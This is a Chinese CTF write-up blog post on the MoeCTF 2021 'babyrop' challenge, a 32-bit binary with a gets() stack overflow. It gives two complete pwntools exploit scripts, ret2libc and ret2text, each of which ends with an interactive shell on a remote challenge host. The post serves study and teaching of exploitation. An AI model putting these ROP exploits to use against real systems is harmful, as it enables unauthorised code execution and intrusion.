0%

[MoeCTF 2021]babyrop

2026-01-20 06:48By
shawnctf
PWNROP

Problem: [MoeCTF 2021]babyrop

思路

  1. checksec

    [*] './babyrop'
    Arch: i386-32-little
    RELRO: Partial RELRO
    Stack: No canary found
    NX: NX enabled
    PIE: No PIE (0x8048000)
    Stripped: No

  2. decompile

    int vuln() { char s[36]; // [esp+0h] [ebp-28h] BYREF gets(s); return 0; } int __cdecl main(int argc, const char **argv, const char **envp) { setvbuf(stdout, 0, 2, 0); setvbuf(stdin, 0, 2, 0); puts("Hello,here is lacanva\n"); puts("I'm a fan of vtubers\n"); puts("But one day Nana7mi and Azi start their live boradcast at the same time\n"); puts("Whose live boradcast should I watch?"); puts("Can you give me some advise?"); vuln(&argc); return 0; }

EXP

解法一,ret2libc

from pwn import * f = "./babyrop" context.binary = elf = ELF(f) context.log_level = "debug" # io = process(f) io = remote("node5.anna.nssctf.cn", 25554) rop = ROP(elf) ret = rop.find_gadget(["ret"])[0] main_addr = elf.sym['main'] puts_plt = elf.plt["puts"] puts_got = elf.got["puts"] payload = b"a" * 0x2c + p32(puts_plt) + p32(main_addr) + p32(puts_got) io.sendlineafter(b"Can you give me some advise?\n", payload) puts_addr = u32(io.recvuntil(b"\xf7")[-4:]) success("puts_addr: " + hex(puts_addr)) payload = b"a" * 0x2c + p32(puts_plt) + p32(main_addr) + p32(elf.got['gets']) io.sendlineafter(b"Can you give me some advise?\n", payload) gets_addr = u32(io.recvuntil(b"\xf7")[-4:]) success("gets_addr: " + hex(gets_addr)) filename = libcdb.search_by_symbol_offsets( {"puts": puts_addr & 0xFFF, "gets": gets_addr & 0xFFF}, select_index=1 ) libc = ELF(filename) libc.address = puts_addr - libc.sym["puts"] system_addr = libc.sym["system"] binsh_addr = next(libc.search(b"/bin/sh")) success("system_addr: " + hex(system_addr)) success("binsh_addr: " + hex(binsh_addr)) payload = b"a" * 0x2c + p32(system_addr) + p32(main_addr) + p32(binsh_addr) io.sendlineafter(b"Can you give me some advise?\n", payload) io.interactive()

解法二,ret2text

from pwn import * f = "./babyrop" context.binary = elf = ELF(f) context.log_level = "debug" # io = process(f) io = remote("node5.anna.nssctf.cn", 28259) bss_addr = 0x804A028 payload = ( b"a" * 0x2C + p32(elf.plt["gets"]) + p32(elf.plt["system"]) + p32(bss_addr) + p32(bss_addr) ) io.sendline(payload) io.sendline(b"/bin/sh") io.interactive()

总结

ret2libc.

还没有人赞赏,快来当第一个赞赏的人吧!
  
© 著作权归作者所有
加载失败
广告
×
评论区
添加新评论